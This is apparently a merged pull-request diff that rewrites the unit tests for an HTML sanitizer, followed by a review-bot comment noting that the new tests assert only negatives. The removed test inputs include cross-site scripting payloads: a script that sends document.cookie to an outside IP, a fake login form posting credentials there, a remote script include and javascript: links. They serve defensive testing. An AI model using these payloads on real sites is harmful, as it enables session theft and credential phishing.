Basic sanity tests for sanitizeHTML #6247

Merged
merged 2 commits into from
Mar 30, 2020
@@ -1,56 +1,17 @@
import { isURLValid, sanitizeHTML } from './sanitizeHTML';

/** not allowed */
const script = '<script src=""></script>';
const script2 = `<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>`;
const xhrScript = `<script>
var xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
</script>`;
const aClick = '<a onClick="() => console.log("hello world")"></a>';
const aClickLang =
'<a lang="en-us" onClick="() => console.log("hello world")"></a>';
const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br></form></h3>`;
const aScript = `<a href="javascript:alert(8007)">Click me</a>`;
const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script src="http://192.168.149.128/xss.js">`;

/** allowed */
const a = '<a href="helloworld.com">Hello world</a>';
const aLang = '<a lang="en-us"></a>';

it('should escape script tags, retain child text, and strip attributes', () => {
expect(sanitizeHTML(script)).toBe('&lt;script&gt;&lt;/script&gt;');
expect(sanitizeHTML(script2)).toBe(
'&lt;script&gt;new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;&lt;/script&gt;'
);
expect(sanitizeHTML(xhrScript)).toBe(
`&lt;script&gt;
var xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('txtName=xss&amp;mtxMessage=xss&amp;btnSign=Sign+Guestbook');
&lt;/script&gt;`
);
});

it('should escape unwanted blacklisted tags', () => {
expect(sanitizeHTML(login)).not.toMatch(/<form|<input/);
expect(sanitizeHTML(aScript)).toBe(`<span>Click me</span>`);
});
describe('sanitizeHTML', () => {
it('should escape non-whitelisted tags', () => {
expect(sanitizeHTML('<script>')).not.toContain('<script>');
});

it('should not allow query string attacks', () => {
expect(sanitizeHTML(queryString)).toBe(
'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;script&gt;&lt;/script&gt;'
);
});
it('should strip non-whitelisted attributes', () => {
expect(sanitizeHTML('<a onmouseover>')).not.toContain('onmouseover');
});

it('should only allow whitelisted HTML attributes', () => {
expect(sanitizeHTML(aClick)).toBe('<a></a>');
expect(sanitizeHTML(aLang)).toBe(aLang);
expect(sanitizeHTML(aClickLang)).toBe(aLang);
expect(sanitizeHTML(a)).toBe(a);
it('should strip invalid href values', () => {
expect(sanitizeHTML('<a href="javascript:void"/>')).not.toContain('href');
});
});

describe('isURLValid', () => {
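Review bot: every assertion kept in the new `describe('sanitizeHTML', ...)` block is negative (`not.toContain('<script>')`, `not.toContain('onmouseover')`, `not.toContain('href')`), so a sanitizer that returned an empty string or dropped the whole element would still pass; the expectations this change removes included positive checks such as `expect(sanitizeHTML(a)).toBe(a)` and `expect(sanitizeHTML(aLang)).toBe(aLang)` that whitelisted markup and attributes survive intact, and at least one of those should be carried over so the suite also fails when the sanitizer over-strips. Separately, `not.toContain('<script>')` in `should escape non-whitelisted tags` is an exact, case-sensitive substring check that would still pass if the output contained `<SCRIPT>` or `<script src=...>`; either assert the exact escaped output (`toBe('&lt;script&gt;')`, as the removed tests did for `script` and `queryString`) or match with a case-insensitive pattern like `not.toMatch(/<script/i)`, in the style of the removed `not.toMatch(/<form|<input/)` check. The `should strip invalid href values` test could likewise confirm that the element and its text are retained (the removed `aScript` expectation, `toBe('<span>Click me</span>')`, showed the intended shape), not only that `href` is gone.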